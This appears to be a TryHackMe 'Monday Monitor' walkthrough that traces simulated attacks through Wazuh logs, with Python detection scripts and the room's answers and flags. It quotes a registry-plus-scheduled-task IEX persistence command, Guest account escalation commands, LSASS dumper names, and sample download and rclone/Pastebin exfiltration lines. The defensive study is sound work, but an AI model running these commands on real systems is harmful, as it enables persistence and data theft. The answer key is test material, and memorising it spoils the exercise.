Monday Monitor

TryHackMe Challenge Walkthrough

Challenge Overview

Swiftspend Finance, a modern fintech company, is testing its new endpoint monitoring setup using Wazuh and Sysmon. Your job is to investigate simulated attack activity from April 29, 2024, between 12:00 PM and 8:00 PM. You’ll use the Wazuh dashboard and saved queries to detect suspicious process behavior, persistence techniques, credential dumping, and data exfiltration attempts.

Threat Analysis Summary

Tools Used

  • Wazuh
  • CyberChef
  • MITRE ATT&CK

Chain Attack Overview

Initial Access

– Malicious .xlsm downloaded via PowerShell (Invoke-WebRequest)
– Filename disguise: SwiftSpend_Financial_Expenses.xlsm → actual: PhishingAttachment.xlsm
– Technique: T1566.001 – Spearphishing Attachment

Execution

– PowerShell launched with -ExecutionPolicy Bypass, encoded commands
– Additional payloads downloaded and run
– Technique: T1059.001 – PowerShell

Persistence

– Registry entry added with obfuscated payload
– Scheduled task set to run daily at 12:34
– Technique: T1053.005 – Scheduled Task

Defense Evasion

– Base64 encoding and renamed binaries (memotech.exe, frundll32.exe)
– Technique: T1027 – Obfuscated Files or Information

Credential Access

– Multiple dumpers: mimikatz, nanodump, xordump, cmdkey, rundll32 keymgr
– Guest account activated and added to Administrators
– Technique: T1003.001 – LSASS Dumping, T1555.003 – Credential Manager Access

Privilege Escalation

– Guest account renamed to I_AM_MONITOR1NG and escalated
– Technique: T1136.001 – Create/Modify User Account

Exfiltration

– Files and possible flags exfiltrated via rclone
– Additional data sent via Pastebin API
– Technique: T1567.002 – Exfiltration to Cloud Storage

MITRE ATT&CK Mapping

| Phase | ID | Technique name | Description |
| --- | --- | --- | --- |
| Initial Access | T1566.001 | Phishing: Spearphishing Attachment | Downloaded .xlsm file disguised as financial spreadsheet |
| Execution | T1059.001 | Command and Scripting Interpreter: PowerShell | PowerShell executes commands and downloads additional payloads |
| Persistence | T1053.005 | Scheduled Task/Job: Scheduled Task | Task created to auto-execute obfuscated PowerShell at 12:34 |
| Defense Evasion | T1027 | Obfuscated Files or Information | Base64-encoded command hidden in registry |
| Credential Access | T1003.001 | OS Credential Dumping: LSASS Memory | memotech.exe used to dump creds |
| Exfiltration | T1567.002 | Exfiltration to Cloud Storage | PowerShell used `rclone` and Pastebin to exfiltrate data |

Reference: [MITRE ATT&CK Navigator](https://attack.mitre.org/)

Initial Recon

Let’s kick things off with the universal SIEM mood-lifter:

Wazuh Query:

powershell

Because if anything shady happens on Windows, chances are it involves PowerShell.

To make events easier to read, I pulled:

  • win.eventdata.commandline
  • data.win.eventdata.parentProcessId
  • data.win.eventdata.processId

To track the chain of events and get a sense of what this chaos is about.

Suspicious Process Chain – Process ID 2980

Process ID 2980 kicks things off with a PowerShell script and spawns 37 child processes like it’s trying to win a botnet parenting award.

And what’s the source of this mischief?

Atomic Red Team playing red flag simulator:

  • T1003.001 Credential Dumping parade:
    • procdump.exe, nanodump.x64.exe, createdump.exe
    • The usual suspects: mimikatz.exe and its clone-y sibling memotech.exe
    • Bonus: xordump.exe, Outflank-Dumpert.exe
  • T1053.005 – Persistence Setup
    • Because if you’re going to break in, at least leave a scheduled task behind to keep the door open.

We also spot repeated use of powershell.exe -ExecutionPolicy Bypass — a common tactic to evade script-blocking restrictions.

Another interesting entry: csc.exe (C# compiler) used from .NET Framework to compile a payload from temp — a classic LOLBin abuse pattern.

Macro Mayhem & Fake Files

Somewhere in this noisy mess:

  • PowerShell pulls SwiftSpend_Financial_Expenses.xlsm to a TEMP folder via Invoke-WebRequest
  • But the log betrays the real filename: PhishingAttachment.xlsm — because subtlety is for amateurs
  • We also saw runWallpaperSetup.cmd — not suspicious at all — and a bunch of whoami.exe spam to check context (because even attackers have identity issues)

Credential Bonanza Continues

The chain from PID 2980 continues with more credential-hungry behavior:

  • cmdkey.exe and rundll32.exe keymgr,KRShowKeyMgr – used to query stored credentials
  • Oddly, we see frundll32.exe – either a typo or renamed LOLBin to avoid detection
  • whoami, hostname, and various local enumeration loops
  • We even see get-childitem and dir pointed at C:\Users\ — probably hunting for juicy files
  • Multiple redundant checks like if (Test-Path …) for credential dumping tools — possibly part of Atomic Red Team test scaffolding or just plain indecision

Spoilers from the PowerShell Logs

The PowerShell command chain ends with two spoilers:

T1567.002 Exfiltration via Cloud Storage
Uses rclone-v*, a command-line tool to sync to cloud — so yeah, secrets.zip is halfway to the cloud

A TryHackMe flag: THM{M0N1T0R_1$_1N_3FF3CT}
Just casually dropped into the logs like a flex.

Also noted: Invoke-RestMethod to pastebin.com/api/api_post.php — yep, they’re exfiling via Pastebin API too.

Deep Dive – PID 2980’s Family Drama

Just because we’re nosy and already deep in the rabbit hole, we queried:

Wazuh Query:

data.win.eventdata.parentProcessId: 2980 OR data.win.eventdata.processId: 2980

We get:

  • 3 logs: “Executable file dropped in folder commonly used by malware”
  • A flood of whoami.exe – just making sure we’re still compromised
  • Confirmation: PhishingAttachment.xlsm = renamed SwiftSpend_Financial_Expenses.xlsm
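The two pivots above (start from everything PowerShell-shaped, then walk parent/child PIDs from 2980 and tag what each child did) are easy to script once the events are exported from Wazuh as JSON. The block below is an added example, not part of the walkthrough or of Wazuh itself: it builds the process tree from Sysmon Event ID 1 records using the same dotted field names the queries use (the `commandLine` casing and the `get_field` walker are assumptions; match them to what your dashboard shows), counts a root's children, and tags each child command line with the indicators this post calls out (ExecutionPolicy Bypass, Invoke-WebRequest, the LSASS dumper names, rclone, the Pastebin API, cmdkey/keymgr). The events are constructed samples modelled on the post, not the room's real logs.

```python
import re
from collections import defaultdict

# Dotted field paths as used in the walkthrough's Wazuh queries. The exact casing
# of the command-line field ("commandLine") is an assumption; adjust to your decoder.
F_PID = "data.win.eventdata.processId"
F_PPID = "data.win.eventdata.parentProcessId"
F_CMD = "data.win.eventdata.commandLine"

# Indicators taken from the behaviours described in this walkthrough.
INDICATORS = [
    ("execution-policy-bypass", re.compile(r"-executionpolicy\s+bypass", re.I)),
    ("download-cradle", re.compile(r"invoke-webrequest|\biwr\b|downloadstring", re.I)),
    ("lsass-dumper", re.compile(
        r"\b(procdump|nanodump[\w.]*|createdump|mimikatz|memotech|xordump|outflank-dumpert)\.exe", re.I)),
    ("cloud-sync-tool", re.compile(r"rclone", re.I)),
    ("paste-site-api", re.compile(r"pastebin\.com/api", re.I)),
    ("credential-manager-query", re.compile(r"cmdkey\.exe|keymgr,KRShowKeyMgr", re.I)),
]


def get_field(event, path):
    """Walk a dotted path through nested dicts; None if any hop is missing."""
    cur = event
    for part in path.split("."):
        if not isinstance(cur, dict) or part not in cur:
            return None
        cur = cur[part]
    return cur


def make_event(pid, ppid, cmd):
    """Build a Wazuh-shaped Sysmon record (constructed sample, not real room data)."""
    return {"data": {"win": {"eventdata": {
        "processId": str(pid), "parentProcessId": str(ppid), "commandLine": cmd}}}}


# Constructed sample events loosely modelled on the PID 2980 family from the post.
SAMPLE_EVENTS = [
    make_event(2980, 1200, "powershell.exe -ExecutionPolicy Bypass -File C:\\AtomicRedTeam\\run.ps1"),
    make_event(3010, 2980, 'powershell.exe -ExecutionPolicy Bypass -Command "Invoke-WebRequest '
                           '-Uri http://attacker.invalid/PhishingAttachment.xlsm '
                           '-OutFile $env:TEMP\\SwiftSpend_Financial_Expenses.xlsm"'),
    make_event(3024, 2980, "whoami.exe"),
    make_event(3031, 2980, "C:\\Temp\\memotech.exe"),
    make_event(3040, 2980, "C:\\Temp\\nanodump.x64.exe"),
    make_event(3055, 2980, 'powershell.exe -Command "& C:\\Temp\\rclone-v1.66\\rclone.exe copy '
                           'C:\\Temp\\secrets.zip remote:exfil"'),
    make_event(3060, 2980, 'powershell.exe -Command "Invoke-RestMethod '
                           '-Uri https://pastebin.com/api/api_post.php -Method Post -Body $body"'),
    make_event(4100, 1200, "explorer.exe"),  # unrelated sibling of 2980; must not be counted
]


def flag_indicators(cmd):
    """Return the indicator names that match one command line, in INDICATORS order."""
    return [name for name, rx in INDICATORS if rx.search(cmd or "")]


def build_tree(events):
    """Map parentProcessId -> list of child events (the 'family' view from the post)."""
    tree = defaultdict(list)
    for ev in events:
        tree[get_field(ev, F_PPID)].append(ev)
    return tree


def triage_root(events, root_pid):
    """Summarise the direct children of root_pid: how many, and which ones matched indicators."""
    children = build_tree(events).get(str(root_pid), [])
    findings = []
    for ev in children:
        tags = flag_indicators(get_field(ev, F_CMD))
        if tags:
            findings.append((get_field(ev, F_PID), tags))
    return {"root": str(root_pid), "child_count": len(children), "findings": findings}


if __name__ == "__main__":
    report = triage_root(SAMPLE_EVENTS, 2980)
    print(f"PID {report['root']} spawned {report['child_count']} direct children")
    for pid, tags in report["findings"]:
        print(f"  child {pid}: {', '.join(tags)}")
```

To use this against real data, export the hits for the `powershell` query from the Wazuh dashboard as JSON, load them into `SAMPLE_EVENTS`'s place, and call `triage_root` with the PID you are pivoting on; on the room's logs you would expect the 37 children the post describes rather than the 6 in the sample.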

Scheduled Persistence & Registry Magic

Roughly four minutes later, a macro triggers this: “Possible Office Macro Started: C:\Windows\System32\cmd.exe”

Which executes:

  • A registry add for persistence
  • A scheduled task using schtasks.exe /CREATE — runs daily at 12:34

The registry value contains this Base64: cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0

Decoded with CyberChef: ping www.youarevulnerable.thm

Yes — the attacker literally trolled us with a passive-aggressive ICMP echo. Respect.
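CyberChef is fine for one value, but the registry-plus-schtasks pattern above is worth parsing programmatically so the decode and the task details come out of the same command line. The block below is an added example, not code from the walkthrough: it pulls the `reg add` key/value/data and the `schtasks /Create` options (`/TN`, `/TR`, `/SC`, `/ST`) out of a command line, Base64-decodes the registry data, and flags the case where the task's `/TR` reads that same registry value back through `Get-ItemProperty` and `FromBase64String`. The decoder is lenient about missing `=` padding because the value appears both padded and unpadded on this page. The sample command is a constructed copy of the Q2 answer with single backslashes; the fixed `/v /t /d` option order in the `reg add` pattern is an assumption.

```python
import base64
import binascii
import re

# reg add <key> /v <name> /t <type> /d <data>  (option order assumed fixed, as in the Q2 answer)
REG_ADD = re.compile(
    r"reg(?:\.exe)?\s+add\s+(?P<key>\S+)\s+/v\s+(?P<name>\S+)\s+/t\s+(?P<type>\S+)\s+/d\s+(?P<data>\S+)",
    re.I)
SCHTASKS = re.compile(r"schtasks(?:\.exe)?\s+/create\b(?P<args>.*)", re.I)
# One schtasks option with either a double-quoted value (backslash escapes allowed) or a bare token.
OPT = re.compile(r'/(?P<opt>tn|tr|sc|st)\s+(?:"(?P<q>(?:\\.|[^"\\])*)"|(?P<u>[^\s"]+))', re.I)

# Constructed sample: the Q2 command line from this walkthrough, with plain backslashes.
SAMPLE_CMD = (
    r'"cmd.exe" /c "reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ '
    r'/d cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0= /f & schtasks.exe /Create /F '
    r'/TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command '
    r'IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('
    r'(Get-ItemProperty -Path HKCU:\SOFTWARE\ATOMIC-T1053.005).test)))" /sc daily /st 12:34"'
)


def decode_b64_lenient(value):
    """Decode Base64 text, restoring dropped '=' padding; None if it is not valid Base64/UTF-8."""
    stripped = value.strip()
    padded = stripped + "=" * (-len(stripped) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyse_persistence_command(cmd):
    """Extract the registry write and the scheduled task from one cmd.exe command line."""
    result = {"registry": None, "decoded_payload": None, "task": None, "reads_registry_payload": False}

    m = REG_ADD.search(cmd)
    if m:
        result["registry"] = m.groupdict()
        result["decoded_payload"] = decode_b64_lenient(m.group("data"))

    s = SCHTASKS.search(cmd)
    if s:
        task = {}
        for o in OPT.finditer(s.group("args")):
            task[o.group("opt").lower()] = o.group("q") if o.group("q") is not None else o.group("u")
        result["task"] = task
        tr = task.get("tr", "")
        # The task is only "registry-backed" if its action reads the value the reg add just wrote.
        if result["registry"] and "FromBase64String" in tr and "Get-ItemProperty" in tr \
                and result["registry"]["name"] in tr:
            result["reads_registry_payload"] = True
    return result


if __name__ == "__main__":
    r = analyse_persistence_command(SAMPLE_CMD)
    print("registry value:", r["registry"]["key"], "->", r["registry"]["name"])
    print("decoded payload:", r["decoded_payload"])
    print("task:", r["task"]["tn"], "runs", r["task"]["sc"], "at", r["task"]["st"])
    print("task executes registry payload:", r["reads_registry_payload"])
```

Run it on the command line from a Sysmon Event ID 1 record and you get the Q2, Q3 and Q4 answers from one pass; the `reads_registry_payload` flag is the part worth turning into a detection, since a scheduled task whose action decodes a registry value is unusual regardless of what the value says.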

Credential Dumping: Still Not Sure Which One to Use

The attacker seems… undecided. So they try multiple LSASS dumpers again, because maybe the sixth time’s the charm.

Let’s Mess with the Guest Account

The attacker now enables and escalates the Guest account:

net user guest /active:yes
net user guest I_AM_MONITOR1NG
net localgroup Administrators guest /add

Guest gets renamed and promoted.

I_AM_MONITOR1NG — okay, hacker. We see you.
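Each of those three `net` commands is low-signal on its own; the detection value is in seeing them land on the same built-in account in sequence (note that `net user <account> <value>` sets the account's password, which is what Q5 asks for, and `net localgroup ... /add` does the promotion). The block below is an added example, not code from the walkthrough: it classifies `net user` / `net localgroup` command lines into enable, set-password and group-add actions, then correlates them per account to surface the enable-plus-privileged-group chain. The password value is deliberately not copied into the finding. The group and account watchlists are assumptions you would tune to your environment; the sample command lines are the ones quoted in this post plus two harmless ones.

```python
import re
from collections import defaultdict

NET = r"\bnet1?(?:\.exe)?\s+"  # net, net1, net.exe
RX_ENABLE = re.compile(NET + r"user\s+(?P<user>\S+)\s+/active:yes\b", re.I)
RX_PASSWORD = re.compile(NET + r"user\s+(?P<user>\S+)\s+(?P<pw>[^/\s]\S*)(?:\s+/\S+)*\s*$", re.I)
RX_GROUP_ADD = re.compile(NET + r'localgroup\s+(?P<group>"[^"]+"|\S+)\s+(?P<user>\S+)\s+/add\b', re.I)

# Assumed watchlists; extend for your environment.
PRIVILEGED_GROUPS = {"administrators", "remote desktop users", "backup operators"}
BUILTIN_WATCHLIST = {"guest", "defaultaccount"}

# Constructed sample: the three commands quoted in the walkthrough plus two benign lines.
SAMPLE_CMDS = [
    "net user guest /active:yes",
    "net user guest I_AM_MONITOR1NG",
    "net localgroup Administrators guest /add",
    "whoami.exe",
    "net user",
]


def classify_account_commands(cmds):
    """Turn account-management command lines into structured findings (password values are not kept)."""
    findings = []
    for cmd in cmds:
        if m := RX_ENABLE.search(cmd):
            findings.append({"action": "enable", "user": m["user"], "command": cmd})
        elif m := RX_GROUP_ADD.search(cmd):
            group = m["group"].strip('"')
            findings.append({"action": "group_add", "user": m["user"], "group": group,
                             "privileged": group.lower() in PRIVILEGED_GROUPS, "command": cmd})
        elif m := RX_PASSWORD.search(cmd):
            findings.append({"action": "set_password", "user": m["user"], "command": cmd})
    return findings


def find_escalation_chains(findings):
    """Accounts that were both enabled and added to a privileged group, with their sorted action set."""
    by_user = defaultdict(set)
    for f in findings:
        action = "privileged_group_add" if f.get("privileged") else f["action"]
        by_user[f["user"].lower()].add(action)
    return {u: sorted(a) for u, a in by_user.items() if {"enable", "privileged_group_add"} <= a}


def severity(findings):
    """Crude scoring: a full chain on a watched built-in account is the worst case."""
    chains = find_escalation_chains(findings)
    if any(u in BUILTIN_WATCHLIST for u in chains):
        return "high"
    if chains or any(f.get("privileged") for f in findings):
        return "medium"
    return "low" if findings else "none"


if __name__ == "__main__":
    found = classify_account_commands(SAMPLE_CMDS)
    for f in found:
        print(f"{f['action']:>13}  {f['user']}  <- {f['command']}")
    print("escalation chains:", find_escalation_chains(found))
    print("severity:", severity(found))
```

Feed it the `commandLine` field of Sysmon process-creation events (or Security 4720/4722/4732 events if you prefer the audit log) grouped by host and a short time window; three separate low alerts become one high-severity "built-in account enabled and promoted" finding.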

John Sterling Gets PTH’d

Finally, memotech.exe (aka off-brand Mimikatz) performs a Pass-the-Hash on john.sterling, using NTLM.

Notepad & Phishing Proof

After stealing credentials, our shiny new admin uses NOTEPAD.EXE to read:

  • confidential.txt
  • Possibly tied to T1566.001 – Spearphishing Attachment

Also, this chain includes event 4792 — which likely launched the exfiltration task.

The Attacker’s Plan, Recapped:

1. Initial Access – Macro-based Office execution
2. Credential Dumping – mimikatz, nanodump, memotech, all the usual suspects
3. Persistence – Registry key + Scheduled Task
4. Privilege Escalation – Activate + promote Guest
5. Credential Abuse – cmdkey, keymgr, Notepad for the win
6. Exfiltration – rclone and Pastebin API
7. Sarcasm Injection – ICMP pings + cheeky THM flag

Q & A

Q1: Initial access was established using a downloaded file. What is the file name saved on the host?
Answer

SwiftSpend_Financial_Expenses.xlsm

Q2: What is the full command run to create a scheduled task?
Answer

"cmd.exe" /c "reg add HKCU\\SOFTWARE\\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0= /f & schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st 12:34"

Q3: What time is the scheduled task meant to run?
Answer

12:34

Q4: What was encoded?
Answer

ping www.youarevulnerable.thm

Q5: What password was set for the new user account?
Answer

I_AM_M0NIT0R1NG

Q6: What is the name of the .exe that was used to dump credentials?
Answer

memotech.exe

Q7: Data was exfiltrated from the host. What was the flag that was part of the data?
Answer

THM{M0N1T0R_1$_1N_3FF3CT}

Conclusion

So what did we learn?
– PowerShell is still everyone’s favorite blunt instrument
– Dumping LSASS is apparently a team sport
– Guest accounts should come with a “do not disturb” sign
– And if someone sends you a macro-laced Excel sheet named PhishingAttachment.xlsm… maybe don’t open it

In the end, the attacker left behind scheduled tasks, renamed LOLBins, multiple exfil routes, and an actual ping to youarevulnerable.thm — just in case we missed the message.

Mission accomplished: we chased down every log, connected every dot, and ruined the attacker’s quiet little Monday.

On to the next mess

$ Whoami

Cybersecurity learner, log nerd, and TryHackMe badge hoarder. Let’s connect on LinkedIn before I get pulled into another packet capture.